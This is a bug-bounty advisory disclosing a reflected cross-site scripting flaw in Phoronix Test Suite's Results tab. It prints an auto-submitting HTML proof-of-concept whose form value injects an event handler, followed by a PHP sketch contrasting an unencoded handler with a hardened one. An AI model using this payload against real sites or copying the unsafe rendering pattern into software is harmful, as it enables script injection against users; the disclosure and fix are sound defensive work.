huntr, Tuonggg, A5039485-6E48-4313-98AD-915506C19AE8
History: Feb 09, 2022 - 3:48 a.m.

Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

2022-02-09 03:48:52
tuonggg
www.huntr.dev
16
cross-site scripting
reflected
phoronix-test-suite
results tab
vulnerability
bug bounty

EPSS

0.001

Percentile

48.0%

Description

Hi, I found a reflected XSS vulnerability (POST-based XSS + no CSRF token) in Phoronix Test Suite, Results tab.

Proof of Concept

Install a local instance of Phoronix.
Create a search results form like this:
// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022-02-08"onfocus="confirm(origin)"autofocus="" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
//
and send it to the victim. The victim clicks on the link, resulting in reflected cross-site scripting.

Impact

This vulnerability is capable of Reflected XSS
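
Mitigation sketch (an added example, not Phoronix Test Suite source code and not part of the original report): it assumes the posted `time_start` is echoed back into the search form's `value` attribute, and shows that unencoded pattern beside a handler that checks a CSRF token, validates the date and encodes for the attribute context. All function names and the `csrf_token` field are hypothetical.

```php
<?php
// Added example: hypothetical handler, not the project's own code.

// Allow-list a YYYY-MM-DD field; anything else falls back to the default.
function clean_date($raw, string $default): string
{
    if (is_string($raw) && preg_match('/^\d{4}-\d{2}-\d{2}$/D', $raw) === 1) {
        [$y, $m, $d] = array_map('intval', explode('-', $raw));
        if (checkdate($m, $d, $y)) {
            return $raw;
        }
    }
    return $default;
}

// Encode for an HTML attribute: quotes are escaped so the value cannot close it.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constant-time comparison of the session's anti-CSRF token with the posted one.
function csrf_ok($sessionToken, $postedToken): bool
{
    return is_string($sessionToken) && is_string($postedToken)
        && $sessionToken !== '' && hash_equals($sessionToken, $postedToken);
}

// Unsafe pattern: the posted value is concatenated straight into the attribute.
function render_unsafe(array $post): string
{
    return '<input type="date" name="time_start" value="' . ($post['time_start'] ?? '') . '" />';
}

// Hardened pattern: reject forged requests, validate, then encode on output.
function render_safe(array $post, $sessionToken): string
{
    if (!csrf_ok($sessionToken, $post['csrf_token'] ?? null)) {
        return 'Request rejected: missing or invalid CSRF token';
    }
    $start = clean_date($post['time_start'] ?? null, date('Y-m-d'));
    return '<input type="date" name="time_start" value="' . attr($start) . '" />';
}

// Constructed sample input mirroring the time_start value from the report.
$post = ['time_start' => '2022-02-08"onfocus="confirm(origin)"autofocus="', 'csrf_token' => 'tok'];
echo render_unsafe($post), PHP_EOL;        // extra attributes end up in the markup
echo render_safe($post, 'tok'), PHP_EOL;   // invalid date replaced by today's date
echo render_safe($post, 'other'), PHP_EOL; // token mismatch, request rejected
```

Validation alone would stop this particular payload, but the output encoding is what protects every other field that is echoed back, so both belong in the handler.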
